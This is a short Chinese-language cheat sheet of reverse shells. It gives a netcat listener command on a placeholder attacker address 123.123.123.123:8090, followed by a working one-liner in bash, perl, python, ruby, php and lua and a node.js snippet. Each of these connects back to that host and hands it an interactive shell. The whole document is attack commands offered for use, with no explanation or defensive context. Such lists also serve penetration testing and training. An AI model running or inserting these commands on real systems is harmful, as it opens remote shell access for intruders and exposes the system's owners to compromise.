常见的反弹 Shell

服务端

假设服务端 IP 假设为 123.123.123.123 开放端口 8090 用于监听。

nc -lvvp 8090

客户端

bash

bash -i >& /dev/tcp/123.123.123.123/8090 0>&1

perl

perl -e 'use Socket;$i="123.123.123.123";$p=8090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("123.123.123.123",8090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("123.123.123.123","8090");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

php

php -r '$sock=fsockopen("123.123.123.123",8090);exec("/bin/bash -i <&3 >&3 2>&3");'

lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('123.123.123.123','8090');os.execute('/bin/bash -i <&3 >&3 2>&3');"

node

(function(){
    var net = require("net"),
    cp = require("child_process"),
    sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(8090, "123.123.123.123", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return "Connected";
})();